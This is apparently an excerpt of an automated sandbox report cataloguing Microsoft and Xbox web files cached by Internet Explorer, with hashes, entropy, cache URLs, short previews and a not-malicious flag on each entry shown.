                                                                                                                                                                                                              Preview: @charset "UTF-8";/*! @ms-mwf/mwf - v1.23.1+5118857 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\navcancl[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2713
                                                                                                                                                                                                              Entropy (8bit):4.1712007174415895
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:r3avxU5hzsIVmVMeLmVMyHf63lboxMCLxvriN6LOAPAnQay78eLx5Tb87nVkEhML:upU0GVeLVGBXvrp4n/1a5TI7Ve/G79KX
                                                                                                                                                                                                              MD5:4BCFE9F8DB04948CDDB5E31FE6A7F984
                                                                                                                                                                                                              SHA1:42464C70FC16F3F361C2419751ACD57D51613CDF
                                                                                                                                                                                                              SHA-256:BEE0439FCF31DE76D6E2D7FD377A24A34AC8763D5BF4114DA5E1663009E24228
                                                                                                                                                                                                              SHA-512:BB0EF3D32310644285F4062AD5F27F30649C04C5A442361A5DBE3672BD8CB585160187070872A31D9F30B70397D81449623510365A371E73BDA580E00EEF0E4E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:res://ieframe.dll/navcancl.htm
                                                                                                                                                                                                              Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html>.... <head>.. <link rel="stylesheet" type="text/css" href="res://ieframe.dll/ErrorPageTemplate.css" />.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.... <title>Navigation Canceled</title>.... <script src="res://ieframe.dll/errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="res://ieframe.dll/httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:navCancelInit(); ">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="res://ieframe.dll/info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\oct2017HP[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):14129
                                                                                                                                                                                                              Entropy (8bit):4.691015869712723
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:9Ifj8baR2tGNZYDgVGTELwVdtvtET2oJKZYqbLFoSfXRAefqvsKlt:2hJzfKZYULF5Y7
                                                                                                                                                                                                              MD5:D105DBA4F9E0989542ECF1B6B6B77539
                                                                                                                                                                                                              SHA1:5F3E4A7428FC0136AB0740C69EE8B6ACB2569070
                                                                                                                                                                                                              SHA-256:BAB0C0791233FE9F29AF9F2B311E374F090F0CAC4F908099B2A591805369D344
                                                                                                                                                                                                              SHA-512:AE7532BCBF5EABF4BD185FE3255ED2E055C4073E2F819FF124C3F42D3A15E49347D1738E02B41E51DDD9EF9908B7E5C9312C40338FB8D27D23A56E3366F9262F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/en-US/home/css/oct2017HP.css
                                                                                                                                                                                                              Preview: /* vid hero overrides */.@media screen and (max-width: 767px) {..videohero {height: 145vw;}.}.@media screen and (min-width: 1921px) {..home-hero .videohero {height: 720px;}.}./* end vid hero overrides */.hero .home-hero .c-sequence-indicator,..home-hero .c-action-toggle {. background-color: rgba(0, 0, 0, 0.4) !important;.}...c-sequence-indicator button,..c-sequence-indicator a {. width: 22px;. height: 20px;.}...c-sequence-indicator button:focus,..c-sequence-indicator a:focus {. outline: 2px dashed #fff !important;. border: 2px dashed #000 !important;.}..@media (min-width: 768px) and (max-width: 1083px) {. .home-hero section {. height: 110vw;. }. .home-hero .m-hero-item>div {. overflow: visible;. }. .home-hero .m-hero-item>div>div {. top: 130% !important;. -ms-transform: none;. transform: none;. }. .home-hero .m-hero-item.f-x-center.f-y-top>div>div {. top: 20% !important;. }. .home-hero .m-hero-item>div>
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\officebrowserfeedbackstrings[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4739
                                                                                                                                                                                                              Entropy (8bit):4.906336580646593
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:AjfoZoEAVzgCM8tWwGUqDq0wUooq/wf8oAo/cf6DtYuSm9UDiX5Y+mESYPf:AcZcPWx/q0wUooq/48oANf6pYvm9UDiv
                                                                                                                                                                                                              MD5:FDAE02BD4A98F87B5BA862DC5905F77F
                                                                                                                                                                                                              SHA1:766AD6377275712B6DAB0297DE16D5E84DFA9B98
                                                                                                                                                                                                              SHA-256:5F3DB535EB689F4535838407D90167D82FCCCEC02AFFE8DEE900976494B096DB
                                                                                                                                                                                                              SHA-512:17909455E20DB3755B5009B51A2933E85383BE575E55F53482CB70A1C99F638970121F275313D2AE1AB034B09C55CBEB881C1D98E10F60741E1456853321449E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/SocScripts/floodgateintl/en/officebrowserfeedbackstrings.js
                                                                                                                                                                                                              Preview: OfficeBrowserFeedback.setUiStrings({FeedbackSubtitle:"What kind of feedback do you have?","_FeedbackSubtitle.comment":"Subtitle in the main feedback control",PrivacyStatement:"Privacy Statement","_PrivacyStatement.comment":"Text for the privacy statement link",Form:{CommentPlaceholder:"Please type in your comment","_CommentPlaceholder.comment":"Placeholder text in the comment input",CategoryPlaceholder:"Select a category (optional)","_CategoryPlaceholder.comment":"Placeholder text for category dropdown",EmailPlaceholder:"Email (optional)","_EmailPlaceholder.comment":"Placeholder text in the email input",RatingLabel:"Rating","_RatingLabel.comment":"Label for the rating control",ScreenshotLabel:"Include screenshot","_ScreenshotLabel.comment":"Label for the screenshot checkbox",Submit:"Submit","_Submit.comment":"Button text for the submit button",EmailCheckBoxLabel:"You can contact me about this feedback","_EmailCheckBox.comment":"Text for Email checkbox"},SingleForm:{Title:"Please provid
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\override[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1531
                                                                                                                                                                                                              Entropy (8bit):4.797455242405607
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:Udf0F+MOu2UOqD3426TKgR2Yyk9696TkMYqdfskeEkeGk/ksuF9qaSm9qags:Ud8FYqTj36TKgR2Yyk9696TkMYO0keEW
                                                                                                                                                                                                              MD5:A570448F8E33150F5737B9A57B6D889A
                                                                                                                                                                                                              SHA1:860949A95B7598B394AA255FE06F530C3DA24E4E
                                                                                                                                                                                                              SHA-256:0BD288D5397A69EAD391875B422BF2CBDCC4F795D64AA2F780AFF45768D78248
                                                                                                                                                                                                              SHA-512:217F971A8012DE8FE170B4A20821A52FA198447FA582B82CF221F4D73E902C7E3AA1022CB0B209B6679C2EAE0F10469A149F510A6C2132C987F46214B1E2BBBC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
                                                                                                                                                                                                              Preview: a.c-call-to-action:hover, button.c-call-to-action:hover{box-shadow:none!important}a.c-call-to-action:hover span, button.c-call-to-action:hover span{left:0!important}...c-call-to-action:not(.glyph-play):after { right: 0!important;} a.c-call-to-action:focus,button.c-call-to-action:focus{box-shadow:none!important}a.c-call-to-action:focus span,button.c-call-to-action:focus span{left:0!important;box-shadow:none!important}...theme-dark .c-me .msame_Header_name {color: #f2f2f2;}...pmg-page-wrapper .uhf div, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf span, .pmg-page-wrapper .uhf p, .pmg-page-wrapper .uhf input {font-family: Segoe UI,SegoeUI,Helvetica Neue,Helvetica,Arial,sans-serif !important;}..@media (min-width: 540px) {.pmg-page-wrapper .uhf .c-uhfh-alert span, .pmg-page-wrapper .uhf #uhf-g-nav span, .pmg-page-wrapper .uhf .c-uhfh-actions span, .pmg-page-wrapper .uhf li, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf #meC
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\override[2].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1531
                                                                                                                                                                                                              Entropy (8bit):4.797455242405607
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:Udf0F+MOu2UOqD3426TKgR2Yyk9696TkMYqdfskeEkeGk/ksuF9qaSm9qags:Ud8FYqTj36TKgR2Yyk9696TkMYO0keEW
                                                                                                                                                                                                              MD5:A570448F8E33150F5737B9A57B6D889A
                                                                                                                                                                                                              SHA1:860949A95B7598B394AA255FE06F530C3DA24E4E
                                                                                                                                                                                                              SHA-256:0BD288D5397A69EAD391875B422BF2CBDCC4F795D64AA2F780AFF45768D78248
                                                                                                                                                                                                              SHA-512:217F971A8012DE8FE170B4A20821A52FA198447FA582B82CF221F4D73E902C7E3AA1022CB0B209B6679C2EAE0F10469A149F510A6C2132C987F46214B1E2BBBC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
                                                                                                                                                                                                              Preview: a.c-call-to-action:hover, button.c-call-to-action:hover{box-shadow:none!important}a.c-call-to-action:hover span, button.c-call-to-action:hover span{left:0!important}...c-call-to-action:not(.glyph-play):after { right: 0!important;} a.c-call-to-action:focus,button.c-call-to-action:focus{box-shadow:none!important}a.c-call-to-action:focus span,button.c-call-to-action:focus span{left:0!important;box-shadow:none!important}...theme-dark .c-me .msame_Header_name {color: #f2f2f2;}...pmg-page-wrapper .uhf div, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf span, .pmg-page-wrapper .uhf p, .pmg-page-wrapper .uhf input {font-family: Segoe UI,SegoeUI,Helvetica Neue,Helvetica,Arial,sans-serif !important;}..@media (min-width: 540px) {.pmg-page-wrapper .uhf .c-uhfh-alert span, .pmg-page-wrapper .uhf #uhf-g-nav span, .pmg-page-wrapper .uhf .c-uhfh-actions span, .pmg-page-wrapper .uhf li, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf #meC
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\privacystatement[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):345166
                                                                                                                                                                                                              Entropy (8bit):4.862295474705609
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:Ny698dTd87wNHDmBS9v+6WjUi0/VYryCGTtLruCkUIx4z7ZV/BdQZyBKRkugyZCX:N487yjrtR/Or2tn8yQIyZCSDH+BdN
                                                                                                                                                                                                              MD5:550923928BEF1F60F8797AD568FD0CEB
                                                                                                                                                                                                              SHA1:E3DE205E05D27B54B9E3E87DC10E33DBE6345F19
                                                                                                                                                                                                              SHA-256:2DE1F7AF2B32B260E717E354EE012DFEFFB11B3F0560B7A6A79E12760587FBCF
                                                                                                                                                                                                              SHA-512:85EC25623CCA6CF3A8E7299827E653C5A2BACA33224E5D020B835916087A681A3346BA81F8E200CC1B5E4FAEE14F5750785CA900EB3130EA0B36D7EFBC3F5008
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .<!DOCTYPE html ><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext" xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="https://www.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.11.2.min.js">.....// Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - http://www.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/*<![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewpo
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\script[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):30000
                                                                                                                                                                                                              Entropy (8bit):5.332708590077928
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:ekorlyUMfQ8sW5hXDiWiQRKKwoOdo/r4nqdRy/dRyWhtyFhtyYKQys05DU7BS5hs:0olDi2RKQOOwqjE2l/3FJ1C/n+NYioq
                                                                                                                                                                                                              MD5:C05FC9430255DD778133F63AAA2874FD
                                                                                                                                                                                                              SHA1:23A6970E85C12ACCE64448EBFBB2A7987304E6B5
                                                                                                                                                                                                              SHA-256:3659742C6031A157C576403757CD0BDC2173108554016ED3AFBEAC683BF13FC0
                                                                                                                                                                                                              SHA-512:651E44E0764AE30478891466973C851A4A5CABF9114C1A97777F8CB6E8F8962907B169C8FDCF57620B2BC97C87D5EE2C1AAAB499F8F507864862987C47CE691C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=8c84dc53-9dee-f42a-46b1-5a93c0e43d70
                                                                                                                                                                                                              Preview: function ShowSelectedComponentKeyPress(n,t){if(window.event.keyCode==13)return ShowSelectedComponent(n,t),!1}function SetRightSideNavigationMenuHeight(){$("[id^=dvModuleGroup_]").hide();window.location.search.toLowerCase().indexOf("bookmarkid")!=-1&&SelectBookMark();window.location.search.toLowerCase().indexOf("componentid")!=-1&&LoadSelectedInternalLink();$(".div_side_comp").length>0&&$(".div_content").css("min-height",$(".div_side_comp").height()-27)}function ShowSelectedComponent(n,t){var i=$("#"+t).attr("data-parentModule");return i!=undefined&&i!=null&&($("[data-parentmodule="+i+"]").show(),$("#"+i+" [id$=_LongDescription]").length>0?(document.getElementById(i+"_LongDescription").style.display="block",document.getElementById(i+"_ShortDescription").style.display="none",ShowText($("#"+i+".learnMoreLabel"),"long")):ShowText($("#"+i+".learnMoreLabel"),"long"),DisplayTopNavigation(i)),$("html, body").animate({scrollTop:$("#"+t).offset().top-1},800),!1}function ShowToolTip(){var n,i,t;w
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\script[2].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):388363
                                                                                                                                                                                                              Entropy (8bit):5.346657831644759
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:Dkirr84Pi4Sj1Khznflh+57oE6qOdGPn13lndKY9nY6IrWYCy3GUYaY0YzYLOYDh:W4Pi4Sj1KhznNh+5UjqOdsl28scv8
                                                                                                                                                                                                              MD5:C0E29231ED331496D0785F74C567C584
                                                                                                                                                                                                              SHA1:972E4068255068435B2EAEF1C292C4E4C11BC824
                                                                                                                                                                                                              SHA-256:2433863D955A37DF6E4802A6F6D47F30850BAC09D6684AB887B7741569E14C2A
                                                                                                                                                                                                              SHA-512:F6962EF6E262D6D0F33BD1BF129FCC04B438ABBDEAE2EFF7A657661B67816317CF15C297154571118CDE7F0A1101C0B76659B3443173D272AA3F8FF51BE7FD41
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=a99b0db8-bfbf-545e-1fb8-9506657ef0a2_548ab34c-2019-5a40-159d-497aca0a31aa_681f815f-66fa-dd0d-337c-f122e5fbc441_0639d99f-aaae-3cfb-dc86-3d058461bd24_8b6e2c63-6927-7db5-8e32-7f3333da659e_336509cc-abc8-912e-9a27-74fc22d5e823_d05d04f0-2693-ec0c-01de-808f5ad22891_693cb7af-5841-0401-bf99-98f0d9ba4140_a42d7277-10a1-6935-b06a-ebeeb8815ba6_30431ce6-63a7-f889-dfb0-0df5e1561da0_a96731a9-c05d-ced4-6287-89c900b1ed4f_55f6f45b-01ff-8a72-87f2-aef7adb3c4ae_2d3684a3-f1a0-d1c4-8c01-8f5b22b0884d_bec3e8b8-6afd-a4da-0cb7-e3f0e65d6704_25785618-c6df-5018-c882-7493400f3937_3d6f4407-99a7-efc0-9273-2886b50fa823_544bfecd-07c5-9fff-20c9-9125b66a3749_cc850638-66c6-0dc0-e5df-a231bf28e478_551d8557-d7a9-ff79-b33c-444fc691a935_88257d23-e3fb-0deb-d967-418273373312_79c01e4e-6436-0168-278f-66f180dd4fdd_360dd1e2-0971-6b97-6b15-bebe0e7ed91e_548c8edb-b925-5700-12de-1fbe1e801b5e_e102ee4d-7772-ae41-a83e-3b7ad65995ca_d707f600-5853-342b-4975-ecd516bff797
                                                                                                                                                                                                              Preview: /*! picturefill - v3.0.2 - 2016-02-12. * https://scottjehl.github.io/picturefill/. * Copyright (c) 2016 https://github.com/scottjehl/picturefill/blob/master/Authors.txt; Licensed MIT. */./*! Gecko-Picture - v1.0. * https://github.com/scottjehl/picturefill/tree/3.0/src/plugins/gecko-picture. * Firefox's early picture implementation (prior to FF41) is static and does. * not react to viewport changes. This tiny module fixes this.. */.function RunPicturefill(){for(var t=jQuery("picture"),n=0;n<t.length;n++)jQuery(t[n]).children("img").each(function(){var u=jQuery(this).attr("data-src"),r=jQuery(this).attr("media"),f=function(i,r){jQuery("<source/>",{media:i,srcset:r}).appendTo(t[n])};switch(r){case"(min-width:1779px)":case"(min-width:1400px)":case"(min-width:1084px)":case"(min-width:768px)":case"(min-width:540px)":case"(min-width:0px)":f(r.toString(),u);jQuery(this).remove();break;default:var e=jQuery(this).attr("src"),o=jQuery(this).attr("alt"),s=jQuery(this).attr("class"),i=jQuery(this).
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\silentauth[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1210
                                                                                                                                                                                                              Entropy (8bit):5.090294073310063
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JDI/4BrUeHq1YaYjbjaCY7ah7xuCo7T5QGgrY:tI/4BrUeHqG3/Z7pmT5jB
                                                                                                                                                                                                              MD5:3DAE0FBA4E7B821A7DF9A030C4C2E951
                                                                                                                                                                                                              SHA1:F8601F94203848BC0432567546B8FB3CB4A455D8
                                                                                                                                                                                                              SHA-256:F1632C72619F17A7F20221962629E658C58D08E2C5C8ED197C7FDE8E3AA3C130
                                                                                                                                                                                                              SHA-512:6EFF1F18548F7BB55F3D45B960A34B0E390926CEBFBB5FFAA472C3A3E81F282053891C7B580DCD163DA437208E9CFFB8AFC23E103B95A6043737E48EC081D65B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.xbox.com/xbcservicewebwww-2104-29112-0-0-main-rolling/www/js/silentauth.js
                                                                                                                                                                                                              Preview: .if (window.addEventListener) {...window.addEventListener("load", RefreshRemoteSession, false);..} else if (window.attachEvent) {...window.attachEvent("onload", RefreshRemoteSession);..} else {...window.onload = RefreshRemoteSession;..}....function RefreshRemoteSession() {...RefreshSession("https://controllers.xbox.com/en-us/mscomhp/onerf/IsUserAuthenticated", "https://controllers.xbox.com/en-us/mscomhp/onerf/MeSilentPassport");...RefreshSession("https://www.microsoft.com/en-us/mscomhp/onerf/IsUserAuthenticated", "https://www.microsoft.com/en-us/mscomhp/onerf/MeSilentPassport");..}....function RefreshSession(isUserAuthenticatedApi, silentPassport) {...$.ajax(isUserAuthenticatedApi, {....type: "GET",....contentType: "text/plain",....xhrFields: {.....withCredentials: true....},....crossDomain: true,....statusCode: {.....'400': function () {......var i = document.createElement("iframe");......i.src = silentPassport;......i.setAttribute("width", "0");......i.setAttribute("height", "0");.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\silentsigninhandler[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):212
                                                                                                                                                                                                              Entropy (8bit):4.942328067468697
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NdW4QW3tu/0M0ZakAqJmOsoVALzDWk4Kqg/MWXfGb:KPg8/LgaJqJmDoXX5GMWPGb
                                                                                                                                                                                                              MD5:420CF56801C0863B226CA40E9EBED0E5
                                                                                                                                                                                                              SHA1:543D3E78BEBBA600BAD0F28573F16AD2B82D51DD
                                                                                                                                                                                                              SHA-256:681B20B4832CA1DB48B0584ECD697D34F5C6C9B2AA68C885892DE3E32AD30532
                                                                                                                                                                                                              SHA-512:9D4B51431D2E0392E07997074CE22CDBDA57AC7F8B74346A945431D2EA30AC97ABA54C96CBCBFE54AF7B239F302CCBEAAFB49FDF0CE7D4EC3B17DE6A19568F51
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ......<!DOCTYPE html>..<html>..<head>...<title></title>..</head>..<body>...<script type="text/javascript">....window.parent.document.dispatchEvent(new Event("userNotAuthenticated"));...</script>..</body>..</html>
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\slider[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):177162
                                                                                                                                                                                                              Entropy (8bit):5.095650872558704
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:DAwmeEZACGBeDNmo9WwqTatIjxrfdx811vWSltmZYVCgGHLR/3xnxHZzyP5kTP3F:jEZACg
                                                                                                                                                                                                              MD5:82783CBE7D9E03F188F2BE826AE0202C
                                                                                                                                                                                                              SHA1:83B63EDC6AD58468015A825567EB2DE2DD88A85F
                                                                                                                                                                                                              SHA-256:AF23E254ACFE2B0C5196C6D902CF15802693EE0D2250309A3E0D9911537C9374
                                                                                                                                                                                                              SHA-512:40CCC05DF3D2292433CA3EA0E49AFBA21A44FCE7C69FAD5B14DEFA87776ADD2E497D1D0DB41046160C141B071FBEB3D7B0BEBBB9673CBF94BA0C20E42BC134ED
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/css/MWF_20210208_31270267/west-european/default/button/glyph/heading/image/list/pagebehaviors/selectmenu/slider?apiVersion=1.0&include_base=true
                                                                                                                                                                                                              Preview: @charset "UTF-8";./*! 1.58.2 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.html{font-family:sa
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\social[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):468726
                                                                                                                                                                                                              Entropy (8bit):5.016232833207847
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:DAwmeEZACGIzyP5kTP3bI0tfYqQ0xtLfj4ZDa813giY8R1j35Ap7zzN1n1JKfNkl:jEZACZwWTj
                                                                                                                                                                                                              MD5:98286B3952FDD739CD28FD65CD35220A
                                                                                                                                                                                                              SHA1:5FB2A5C2598995BD4431419EEA23CDE70B3646A0
                                                                                                                                                                                                              SHA-256:1469E0E9560EC70E88DCDD003AD4F98B1210F25DBD50BC3B2C632B6668A27BD7
                                                                                                                                                                                                              SHA-512:39682F007615952E02B13EED2F8A30E05830F4D072E146647025FDD1A4A7552BB7D46E4585030B86298ED1C0A2ED3C00E2EA594C9908FC0D6B27205ACA3DE82C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/css/MWF_20210208_31270267/west-european/default/actiontoggle/alert/ambientvideo/areaheading/autosuggest/button/contentplacement/contentplacementitem/dialog/divider/drawer/glyph/heading/hero/heroitem/hyperlinkgroup/image/imageintro/list/mosaicplacement/multislidecarousel/pagebehaviors/productplacement/rating/skiptomain/slider/social?apiVersion=1.0&include_base=true
                                                                                                                                                                                                              Preview: @charset "UTF-8";./*! 1.58.2 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.html{font-family:sa
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\style[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):620154
                                                                                                                                                                                                              Entropy (8bit):5.018708589283582
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:x/RhWWB+KFBVDZJ/tymPjHAiUqDQYJro6p98nL+3ia5CjlmvwGQtIw85AMJIKb0j:tno6p98nL+3T5CjlmvwGQtR85AMJIKbM
                                                                                                                                                                                                              MD5:96BA4BEBA11E8AC021980DA330711FE1
                                                                                                                                                                                                              SHA1:404C84DEF9E7B524D496766F1BB7A9C979D0447A
                                                                                                                                                                                                              SHA-256:5B110906CC11D91A86B4070FACBBD87FBA46F8B61403915155EBD76847C49332
